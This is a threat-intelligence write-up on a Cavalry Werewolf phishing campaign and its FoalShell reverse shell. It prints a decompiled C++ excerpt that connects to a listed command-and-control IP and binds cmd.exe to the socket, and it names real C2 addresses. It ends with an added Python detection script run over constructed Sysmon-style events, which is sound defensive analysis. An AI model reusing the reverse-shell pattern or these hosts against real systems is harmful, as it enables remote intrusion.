A sophisticated threat campaign has emerged targeting Russia’s public sector and critical industries between May and August 2025.
The Cavalry Werewolf APT group, also known as YoroTrooper and Silent Lynx, has been actively deploying custom-built malware toolsets through highly targeted phishing operations that exploit trusted governmental relationships.
The campaign focuses on organizations within energy, mining, and manufacturing sectors, leveraging two primary malware families designed for persistent access and command execution.
The threat actors employ spear-phishing emails disguised as official correspondence from legitimate Kyrgyz government entities, including the Ministry of Economy and Commerce and the Ministry of Transport and Communications.
These messages carry RAR archives containing either FoalShell reverse shell or StallionRAT remote access trojan, with filenames carefully crafted to mimic genuine official documents such as “three-month results of joint operations” or “shortlist of employees to receive bonuses.”
The attackers blur the line between impersonation and actual compromise, with evidence suggesting they may have successfully breached real official email accounts to enhance their operational credibility.
Picussecurity analysts identified that the malicious archives are typically downloaded to the %LocalAppData%\Microsoft\Windows\INetCache\Content.Outlook directory, presenting a key detection opportunity for security teams monitoring Outlook cache activity.
The sophistication of this campaign extends beyond social engineering tactics, incorporating multi-language malware implementations that demonstrate the group’s technical versatility and commitment to operational security.
The threat actors have developed variants of their malware in C#, C++, Go, PowerShell, and Python, each designed to evade detection through different mechanisms while maintaining core command-and-control functionality.
Desktop artifacts discovered during analysis indicate the group is preparing to expand beyond Russian targets, with files in Tajik language suggesting interest in Tajikistan and Arabic-named documents pointing toward potential Middle Eastern reconnaissance.
The discovery of AsyncRAT installer files further highlights the group’s evolving toolkit and ambitious operational scope.
FoalShell: Multi-Language Backdoor Architecture
FoalShell represents a lightweight but effective reverse shell implementation designed to grant attackers command-line access through cmd.exe on compromised systems.
The malware’s architecture varies across programming languages, with the C# version establishing straightforward TCP connections to command-and-control servers while maintaining stealth through hidden window styles.
The core functionality operates through a continuous loop that receives commands, executes them via cmd.exe, and returns both standard and error output to the C2 infrastructure located at IP address 188.127.225.191 on port 443.
The C++ variant employs more sophisticated evasion techniques through shellcode loading mechanisms.
An obfuscated FoalShell shellcode is embedded within the executable’s resources under the name “output_bin,” which is extracted and executed in memory allocated with Read, Write, Execute permissions using VirtualAlloc.
The shellcode then deobfuscates the main reverse shellcode before establishing network connectivity to C2 server 109.172.85.63.
*(_DWORD *)&name.sa_data[2] = inet_addr("109.172.85.63");   // sockaddr_in: sa_data[2..5] holds the IPv4 address (port in sa_data[0..1] is set earlier, not shown in this excerpt)
WSAConnect(s, &name, 16, 0LL, 0LL, 0LL, 0LL);                // connect the socket s to the C2 server
StartupInfo.dwFlags = 257;                                   // 257 = STARTF_USESTDHANDLES (0x100) | STARTF_USESHOWWINDOW (0x1)
StartupInfo.hStdError = (HANDLE)s;                           // all three standard handles point at the socket,
StartupInfo.hStdOutput = (HANDLE)s;                          // so cmd.exe reads commands from and writes output to the C2 channel
StartupInfo.hStdInput = (HANDLE)s;
CreateProcessA(0LL, (LPSTR)"cmd.exe", 0LL, 0LL, 1, 0, 0LL, &StartupInfo, &ProcessInformation);   // bInheritHandles = 1 so the child inherits the socket handle
The Go implementation utilizes its own networking stack to connect to C2 server 62.113.114.209 on port 443, forcing cmd.exe processes to run in hidden window states through the HideWindow parameter set to 1.
This multi-language approach allows the attackers to adapt their deployment strategy based on target environment characteristics and security posture, making detection more challenging for traditional signature-based security solutions.
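The article names three detection opportunities: RAR archives written to the Outlook attachment cache, cmd.exe started by something other than a normal parent (the reverse shell binds cmd.exe to its socket), and outbound connections to the three FoalShell C2 addresses. The script below is an added example (not code from the article or from Picussecurity) that turns those three observations into rules over constructed Sysmon-style events. The event shape, the field names (EventID, Image, ParentImage, TargetFilename, DestinationIp, RecordId) and the sample records are assumptions modelled on Sysmon event IDs 1, 3 and 11; only the C2 addresses and the Content.Outlook path come from the article.

```python
"""Triage of Sysmon-style events for the FoalShell indicators in the article.
Added example; event layout and sample data are constructed assumptions."""
import re
from typing import Dict, List

# Network indicators reported in the article (C# / C++ / Go variants).
FOALSHELL_C2 = {"188.127.225.191", "109.172.85.63", "62.113.114.209"}

# Outlook attachment cache where the phishing RAR archives are written
# (%LocalAppData% expands to ...\AppData\Local).
OUTLOOK_CACHE_RE = re.compile(
    r"\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content\.Outlook\\", re.I)
ARCHIVE_RE = re.compile(r"\.(rar|zip|7z)$", re.I)


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    hits: List[str] = []
    eid = ev.get("EventID")

    # Rule 1: an archive lands in the Outlook cache (Sysmon ID 11, FileCreate).
    target = ev.get("TargetFilename", "")
    if eid == "11" and OUTLOOK_CACHE_RE.search(target) and ARCHIVE_RE.search(target):
        hits.append("archive_dropped_in_outlook_cache")

    # Rule 2: outbound connection to a known C2 (Sysmon ID 3, NetworkConnect).
    if eid == "3" and ev.get("DestinationIp") in FOALSHELL_C2:
        hits.append("connection_to_known_foalshell_c2")

    # Rule 3: cmd.exe spawned by a binary running out of the cache or a temp
    # directory (Sysmon ID 1, ProcessCreate). FoalShell starts cmd.exe with its
    # standard handles bound to the socket; the odd parent is what stands out.
    if eid == "1":
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "")
        if image.endswith("\\cmd.exe") and (
                OUTLOOK_CACHE_RE.search(parent) or "\\temp\\" in parent.lower()):
            hits.append("cmd_spawned_from_cache_or_temp")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map RecordId -> matched rule names for every event that hit a rule."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            findings[ev["RecordId"]] = hits
    return findings


# Constructed sample telemetry (not real captures). Record 1-3 should hit,
# records 4-5 are benign controls.
SAMPLE_EVENTS = [
    {"RecordId": "1", "EventID": "11", "Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\ivan\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\AB12CD34\three-month results.rar"},
    {"RecordId": "2", "EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\ivan\AppData\Local\Temp\Rar$EXa0.123\results.exe"},
    {"RecordId": "3", "EventID": "3", "Image": r"C:\Users\ivan\AppData\Local\Temp\Rar$EXa0.123\results.exe",
     "DestinationIp": "188.127.225.191", "DestinationPort": "443"},
    {"RecordId": "4", "EventID": "1", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"RecordId": "5", "EventID": "3", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": "53"},
]

if __name__ == "__main__":
    for record_id, rules in triage(SAMPLE_EVENTS).items():
        print(f"record {record_id}: {', '.join(rules)}")
```

Rule 3 is deliberately broad (any cmd.exe whose parent runs from a temp or cache path), so expect to tune it against your own baseline; rules 1 and 2 are narrow enough to alert on directly, with rule 2 only as good as the indicator list, which the article gives for these three variants only.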